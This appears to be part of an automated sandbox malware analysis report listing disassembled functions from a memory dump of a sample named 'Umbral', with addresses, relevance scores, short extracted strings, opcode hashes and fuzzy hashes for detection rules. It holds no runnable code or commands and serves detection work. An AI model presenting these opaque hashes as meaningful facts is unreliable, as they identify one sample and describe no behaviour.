                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbea9b97f3376fa86267145dfe53ed75857f206a71b491b215da3fd1c507f10a
                                        • Instruction ID: 3b894f712099b632919061a071380ff87424870f794fcfa7a1d0b75c11358a9e
                                        • Opcode Fuzzy Hash: cbea9b97f3376fa86267145dfe53ed75857f206a71b491b215da3fd1c507f10a
                                        • Instruction Fuzzy Hash: 7632BE31A1CA465FE75CFA2894522B973D1FF99780F44417EE08EC72C7DF38A8468689
                                        Function 00007FF848EC44F0 Relevance: .7, Instructions: 748COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76bdd55931d9e4e8c247b139dcaf60a0073460750d73690ed290a9c7406d9b13
                                        • Instruction ID: d47d62fd679c687e03527573ce8b5319bc0f9a684d4adf11e30ee152a4f84fcf
                                        • Opcode Fuzzy Hash: 76bdd55931d9e4e8c247b139dcaf60a0073460750d73690ed290a9c7406d9b13
                                        • Instruction Fuzzy Hash: 0E423B30A1CA098FEBA8EB18C494BA973E1FF58344F1445B9D44EC7295DF35E882CB45
                                        Function 00007FF848EC4568 Relevance: .6, Instructions: 645COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1a094596d7efe3db38c05fd2c79cf2b0e495afc9ac10f156a3e454729f62804
                                        • Instruction ID: da36ee1d7cda8ebf4b72dce78b525379c2024bd66900094d1850b5cefa8d178b
                                        • Opcode Fuzzy Hash: b1a094596d7efe3db38c05fd2c79cf2b0e495afc9ac10f156a3e454729f62804
                                        • Instruction Fuzzy Hash: 29126031A1CA0A8FDB98EA19D481A71B3E2FFA5354F14456DC44EC7686DF35F882C784
                                        Function 00007FF848E83218 Relevance: .5, Instructions: 545COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 81fcd5c1d51c81ee1755c3d672da88c8118d54c01dec5f8411251ea273c0ab5e
                                        • Instruction ID: 11a66ec5b5c7b95fdb54472d40863ce46d29c29a895fa22cee4a294bd65e7d83
                                        • Opcode Fuzzy Hash: 81fcd5c1d51c81ee1755c3d672da88c8118d54c01dec5f8411251ea273c0ab5e
                                        • Instruction Fuzzy Hash: 0A029E30A08A4A8FEB9CEF2CC4546B977E1FF9A344F5441A9D40AC7296DF35AC42CB44
                                        Function 00007FF848E91B64 Relevance: .3, Instructions: 315COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f226c6409b4aa811c2d7a74e2cea60d162769980d783506a920c0e5188e9c84
                                        • Instruction ID: bb217af6a1c387f70ae3ad33c9e696cedd75f0e6d0f841803776f6649ccbd91b
                                        • Opcode Fuzzy Hash: 8f226c6409b4aa811c2d7a74e2cea60d162769980d783506a920c0e5188e9c84
                                        • Instruction Fuzzy Hash: 14913531A0DEC65FE74AAB3884555B1BBE1FFA6294B1841FFC04AC71A7CF299846C341
                                        Function 00007FF848E8D69D Relevance: 6.5, Strings: 4, Instructions: 1536COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @L_H$H$KL_H$LL_H
                                        • API String ID: 0-664019175
                                        • Opcode ID: b14d3553a71a408edc59beb250d76ed0073710ec312cc9daae76c938f99dde21
                                        • Instruction ID: d9404b268b929395437415d16228c068e987b60b2226ee23e2558ee7d800652c
                                        • Opcode Fuzzy Hash: b14d3553a71a408edc59beb250d76ed0073710ec312cc9daae76c938f99dde21
                                        • Instruction Fuzzy Hash: 87B28230E08A8A9FE798EB5CD8457ADB7B2FF5A350F6441A5D00DD7286CE34AC42CB15
                                        Function 00007FF848E79A69 Relevance: 4.4, Strings: 2, Instructions: 1923COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: H$H
                                        • API String ID: 0-136785262
                                        • Opcode ID: 66f351bca78a146d202175e1d1691a6e3bab854adfda5efb3a30cb27a328b725
                                        • Instruction ID: e7d0d0c8f767f373e6e97188a9339a020b070f0afcd029b4431664edb19abdec
                                        • Opcode Fuzzy Hash: 66f351bca78a146d202175e1d1691a6e3bab854adfda5efb3a30cb27a328b725
                                        • Instruction Fuzzy Hash: B4E28E34A19A4E9FEB89EF28C455BA973E2FF99340F2445B9D009C7286DF38E841C745
                                        Function 00007FF848E7C198 Relevance: 3.7, Strings: 1, Instructions: 2457COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: aM_H
                                        • API String ID: 0-2679691728
                                        • Opcode ID: 06bf0d12cf30978a111f1b17f71cf422c682bdf43c03bead51cc6dbdcee78cdd
                                        • Instruction ID: f1d0810b492b5c3569963f90be035fbcbbf2fc9d438e88ab95f34963210061b4
                                        • Opcode Fuzzy Hash: 06bf0d12cf30978a111f1b17f71cf422c682bdf43c03bead51cc6dbdcee78cdd
                                        • Instruction Fuzzy Hash: 63130930609A4A8FDB85EF1CC498BA973E2FF99344F1545A9E41DCB296CF35E852CB04
                                        Function 00007FF848E88A00 Relevance: 3.3, Strings: 2, Instructions: 823COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: H$H
                                        • API String ID: 0-841772641
                                        • Opcode ID: bc31ea21a546b912e6c112872a15d096b1d6c31f8d70c4105abec367241ed6d5
                                        • Instruction ID: cc5aa071ef61fe91b11c2bb2b97b0cd60c736adf57c7150cadb93a286440e85a
                                        • Opcode Fuzzy Hash: bc31ea21a546b912e6c112872a15d096b1d6c31f8d70c4105abec367241ed6d5
                                        • Instruction Fuzzy Hash: 1242EE31E0DE8B5FE699FA2C542117476A2FFAA780F5841BAC04ACB1D7DE39BC058245
                                        Function 00007FF848EBBA38 Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 1I_H$;P
                                        • API String ID: 0-77558837
                                        • Opcode ID: bfb2f9228a2b069572aa2fe1a92c65a167a81e9dea912558ce9d48ed70e8bceb
                                        • Instruction ID: 8663f44d628e5b1dd59635d5e2d30457c87f3b4bc04baa551c6a646a9936ee17
                                        • Opcode Fuzzy Hash: bfb2f9228a2b069572aa2fe1a92c65a167a81e9dea912558ce9d48ed70e8bceb
                                        • Instruction Fuzzy Hash: 63510562E1CA865FE759F72C94A14F67BD0FF56398F1801B9D089C7183DF25E8428784
                                        Function 00007FF848E79C65 Relevance: 2.2, Strings: 1, Instructions: 906COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: H
                                        • API String ID: 0-2852464175
                                        • Opcode ID: bd69d2f6375826bf1bbb568c957a07e66d5e6ab0b7e35ce5f1ccad9835712c49
                                        • Instruction ID: cc57d074f0592ec198f673d167286cc680a66d319d0fa8d505d5b525172c6cb6
                                        • Opcode Fuzzy Hash: bd69d2f6375826bf1bbb568c957a07e66d5e6ab0b7e35ce5f1ccad9835712c49
                                        • Instruction Fuzzy Hash: CE52B120A1DE4E5FEB89EB2C8411BB973E2FF99740F6445B9D009C729BDE38AC018755
                                        Function 00007FF848E83399 Relevance: 1.9, Strings: 1, Instructions: 691COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: H0H
                                        • API String ID: 0-2593808432
                                        • Opcode ID: 21757e0d1189e51405a53b12239e576f35416883223d881384b4d97d3795db95
                                        • Instruction ID: f0c533dd0c42b0941cf3b3e7dbdf39bbe295ab60206859a31c3398ad9c426ffb
                                        • Opcode Fuzzy Hash: 21757e0d1189e51405a53b12239e576f35416883223d881384b4d97d3795db95
                                        • Instruction Fuzzy Hash: 37326E30A08A4E8FDB88EF28C454AAA77F2FF59340F5455A9D41AC7296CF35EC42CB40
                                        Function 00007FF848EAB1A0 Relevance: 1.8, Strings: 1, Instructions: 569COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: 84cbf1a0e6af69c9374387cc02164e152c6e30d735756e05884ad1149ac336c3
                                        • Instruction ID: 42740691564dce65ba6fd513de7c921f7711fe11e6079b536ca85a9af92b7169
                                        • Opcode Fuzzy Hash: 84cbf1a0e6af69c9374387cc02164e152c6e30d735756e05884ad1149ac336c3
                                        • Instruction Fuzzy Hash: 6402AD30A1CB498FD768EB18D4856B6B3E1FF98350F14467ED08EC3696DB35B8428B85
                                        Function 00007FF848E7C450 Relevance: 1.7, Instructions: 1743COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6fa701dfe73f74324c805c94bccbf4cf9048d33efd963e4a03bcaab228c1621
                                        • Instruction ID: 8df8b57bc91dbfae435cf70f7abf3d5b6915b7c0a65743039d0fe9e27ae78481
                                        • Opcode Fuzzy Hash: a6fa701dfe73f74324c805c94bccbf4cf9048d33efd963e4a03bcaab228c1621
                                        • Instruction Fuzzy Hash: C1D20930609A4A8FDB85EF1CC454AA973E2FF9E381F5545A5E40DCB2A6CF35EC528B04
                                        Function 00007FF848E8A598 Relevance: 1.6, Strings: 1, Instructions: 352COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: kI_H
                                        • API String ID: 0-4144796008
                                        • Opcode ID: f07acad2c3ae28333cf54fe3bb6469e40629983aa9783c0c87b1ceca0c53dfcc
                                        • Instruction ID: 903ad1ee14999783e13ef91478ce47f621921693938e5157833e203626e87399
                                        • Opcode Fuzzy Hash: f07acad2c3ae28333cf54fe3bb6469e40629983aa9783c0c87b1ceca0c53dfcc
                                        • Instruction Fuzzy Hash: 5EA12F21B1CA4A4EF9E8FA6854552B923C2FFA9784F5400B9D80DC72DADF3DEC474249
                                        Function 00007FF848E72731 Relevance: 1.6, Strings: 1, Instructions: 339COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: yT_H
                                        • API String ID: 0-434257503
                                        • Opcode ID: 2ec8235f859a5b31b6fdb5ac19769be1512d821f8b0d63a48464d6b690296647
                                        • Instruction ID: 19c1311e783e2950ace8a50bcc52c6ec6d6d2325048cc5056d014cf387b669b2
                                        • Opcode Fuzzy Hash: 2ec8235f859a5b31b6fdb5ac19769be1512d821f8b0d63a48464d6b690296647
                                        • Instruction Fuzzy Hash: BAA1D631E1CA4D4FD7A4EB2C98456B9B3E1FB99790F04027AD04ED3246DF34AC428785
                                        Function 00007FF848E70E30 Relevance: 1.6, Strings: 1, Instructions: 331COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: yT_H
                                        • API String ID: 0-434257503
                                        • Opcode ID: b478010151fe3773fe583469bad0baaf6bd382d17654893412464ba23071e14f
                                        • Instruction ID: c07124cb93fedee02134ce8fc2ea9baa6557c61b105341c6e48e1b59c0dfb4b8
                                        • Opcode Fuzzy Hash: b478010151fe3773fe583469bad0baaf6bd382d17654893412464ba23071e14f
                                        • Instruction Fuzzy Hash: BDA1B431E1CA5D4FDBA4EB2C98456B9B3E1FB99790F44027AD04ED3286DF34AC428785
                                        Function 00007FF848E78285 Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M_^
                                        • API String ID: 0-921959145
                                        • Opcode ID: ec84b96383b2976a0070f99674405205b06a63163d5ae277f51adce9fb890529
                                        • Instruction ID: da7d40bd21a9bdced847304942683e5c4daf8d642c066fb0025484329cff1726
                                        • Opcode Fuzzy Hash: ec84b96383b2976a0070f99674405205b06a63163d5ae277f51adce9fb890529
                                        • Instruction Fuzzy Hash: B9A1262190D6EA5FE366A63848161B57FA0EF57390F0901FAD48DCB1D3EE29680B8359
                                        Function 00007FF848E8A398 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (sH
                                        • API String ID: 0-2369605107
                                        • Opcode ID: 78064eefb72cc97f3d1b5ef442b0d9391f3f6d55690aff8b182731bf1b349956
                                        • Instruction ID: d0361692531a7c5f5aaf58a30beeb1195e3cbc3ef503c51b1a125d5d09a37db1
                                        • Opcode Fuzzy Hash: 78064eefb72cc97f3d1b5ef442b0d9391f3f6d55690aff8b182731bf1b349956
                                        • Instruction Fuzzy Hash: 07519131A1C94A9FEF98EA2CC485A6973D2FFA5350B1841B9D00EC7296DF35EC428744
                                        Function 00007FF848E8B71D Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;P
                                        • API String ID: 0-3018336848
                                        • Opcode ID: b184b3204b20e398b95aeb0fc07b5f91271957cb1cbd94a31b32cbb30e00999f
                                        • Instruction ID: aa6703f27d68dad34c867d0f2a531a4110af9f0ea9937d63f991760021c0086e
                                        • Opcode Fuzzy Hash: b184b3204b20e398b95aeb0fc07b5f91271957cb1cbd94a31b32cbb30e00999f
                                        • Instruction Fuzzy Hash: C431F771A1D9495FEB4CBA1898465FD33D0EBA6360F04107EF84F831C7DE25A846438A
                                        Function 00007FF848E7FA55 Relevance: 1.2, Instructions: 1230COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 36996aedf25ac2d9b967702391e526ce608c34d847e209ba0ad569465966c28e
                                        • Instruction ID: 04679900f0b697444f4102062a2abd9a5051645c2af852c5ef4074008042595f
                                        • Opcode Fuzzy Hash: 36996aedf25ac2d9b967702391e526ce608c34d847e209ba0ad569465966c28e
                                        • Instruction Fuzzy Hash: 4982AE3060DF898FE759EB2CC4206657BB2EF4F384B5542EAD409CB2A7CE32AC458755
                                        Function 00007FF848E8A348 Relevance: 1.0, Instructions: 1002COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ff62d9d9fd6aa27dd3b521bb61f43805a3a41319aa23fae5fe2b7164b773381
                                        • Instruction ID: 9fc1e036e053e3eb45e96979aa9536dd81c6c6d1216f9daa2a1592da109c1e43
                                        • Opcode Fuzzy Hash: 9ff62d9d9fd6aa27dd3b521bb61f43805a3a41319aa23fae5fe2b7164b773381
                                        • Instruction Fuzzy Hash: 4562F030A1CA0A8FEB98EB2C9859A7477D1FF69384F1501B9D40AC76A2DF35EC42C745
                                        Function 00007FF848E8A2ED Relevance: .8, Instructions: 785COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c1bf4e559ca9a520fc2b8be49df6cccd2544420903c20fcc40f7f0139675189
                                        • Instruction ID: e254648a91bf49a530d4327428419b53657f4c2ed7ddeef6463d0d86b4057a19
                                        • Opcode Fuzzy Hash: 2c1bf4e559ca9a520fc2b8be49df6cccd2544420903c20fcc40f7f0139675189
                                        • Instruction Fuzzy Hash: E5325930618A498FEBA5FB2CC494B6977E1FF59740F1401BAD44ECB2A6CE24EC418B95
                                        Function 00007FF848E83E49 Relevance: .7, Instructions: 697COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe78211ee957fe3199deacecef50880f2423ca8ec0975bd557ad07c6a0cc80e6
                                        • Instruction ID: 6cbcc1b49ef25449a98cc3880ed6beec94443cf63754e5fe2e7d6fd4d36c293d
                                        • Opcode Fuzzy Hash: fe78211ee957fe3199deacecef50880f2423ca8ec0975bd557ad07c6a0cc80e6
                                        • Instruction Fuzzy Hash: 84327230A18A4E8FDB89EF18C454AAA77F2FF59344F5445A9D41AC7296CF35EC42CB80
                                        Function 00007FF848EC4578 Relevance: .6, Instructions: 615COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 682948dbffb67ff2dc9550f082e62f205d540246f2ca96c8da426fb2b118a699
                                        • Instruction ID: dabfcfee0ca7053f0fe2f192b4cbc97e1fc5e4d12db4eae5973c187fefe0abd4
                                        • Opcode Fuzzy Hash: 682948dbffb67ff2dc9550f082e62f205d540246f2ca96c8da426fb2b118a699
                                        • Instruction Fuzzy Hash: 4002AF31E0CA4A8FE798EA18D455A65B3E2FBA9350F1441BAD04DC7286DB35EC83C785
                                        Function 00007FF848E79554 Relevance: .6, Instructions: 552COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64a8ab9a0048170f901ed8e6e15361bd350061f07f8f06653a9ddb26aab35971
                                        • Instruction ID: 20d85cdb48420b8447e4af78f870a4c0e3140cb97d116fd905030aeed574a810
                                        • Opcode Fuzzy Hash: 64a8ab9a0048170f901ed8e6e15361bd350061f07f8f06653a9ddb26aab35971
                                        • Instruction Fuzzy Hash: F502B211E0EA8B5FF79ABB2894152B927A2FF5A780F1844B9C049C7197EF3DAC019345
                                        Function 00007FF848E79600 Relevance: .5, Instructions: 451COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45bee0fff1d25489bb6e9f81cbdb5dc78e3c2a3b9d3a3f97a5dafd38346905a
                                        • Instruction ID: 27598e43f0b7e66f6aeade0e747a8a84453ade3f1d2ed13d2491b1184aea92bc
                                        • Opcode Fuzzy Hash: b45bee0fff1d25489bb6e9f81cbdb5dc78e3c2a3b9d3a3f97a5dafd38346905a
                                        • Instruction Fuzzy Hash: 74E1A611E0DE8F5FF79AAB2894152B567A2FF5A780F5844F9C049C719BEE3DAC018344
                                        Function 00007FF848E78DA9 Relevance: .4, Instructions: 449COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 381de68ba6bad07c0762ae76183722d4c98f93909e566b42392df6bcfab11566
                                        • Instruction ID: 83ac0edfb343fc6305f445607d1d19db511090c64e2167e34b155bf45f928c7b
                                        • Opcode Fuzzy Hash: 381de68ba6bad07c0762ae76183722d4c98f93909e566b42392df6bcfab11566
                                        • Instruction Fuzzy Hash: 0CD19F20A0ED5E1FEA99FA3894152BD2693FF9A780F1505B9D05DC72CBEE3D6C028345
                                        Function 00007FF848E92538 Relevance: .4, Instructions: 424COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74ce12a06232339ef31bfc56dee47d1b0a4964136ea25af6b84b72bc24b53050
                                        • Instruction ID: 9a44b8cf93a1f644bf32b3792ad93e9322b2f4397f6500d59acb259bf9303bf5
                                        • Opcode Fuzzy Hash: 74ce12a06232339ef31bfc56dee47d1b0a4964136ea25af6b84b72bc24b53050
                                        • Instruction Fuzzy Hash: 32C14321A0DE4E4FE798FBAC94586B877D1FF99398F0401FAD40DC7292EE68AC458344
                                        Function 00007FF848E8D249 Relevance: .4, Instructions: 409COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e1e9156261468595a963ee1ad9232dd77f38ae2ee62817fef13ee12b11d0102
                                        • Instruction ID: 116ef23c2aac4694c686ba58a0445d3a3c9746fb922460e106fd230933707e0d
                                        • Opcode Fuzzy Hash: 4e1e9156261468595a963ee1ad9232dd77f38ae2ee62817fef13ee12b11d0102
                                        • Instruction Fuzzy Hash: 61D16F31A2CE459FDB98EB1CD0819A973E1FFA9350B5441A9D00AC36A6DF35FC428B85
                                        Function 00007FF848E815B8 Relevance: .4, Instructions: 403COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ea6a8c2f5c6e09452027ad5bc12d0f440524210e9fee443401f553fb705f06e
                                        • Instruction ID: 26f3092332c2e37cb4e4db561c32306e722287aabb199f0c5b906ed7a35536d1
                                        • Opcode Fuzzy Hash: 6ea6a8c2f5c6e09452027ad5bc12d0f440524210e9fee443401f553fb705f06e
                                        • Instruction Fuzzy Hash: C0C12920B1DA068FF798A619884127D77C2FF86790FA0407ED44EC72D7DF39A8824646
                                        Function 00007FF848E889ED Relevance: .4, Instructions: 398COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f7601739208999cc5e749f7239a918d644f9a965bc85192029df75432aeae28
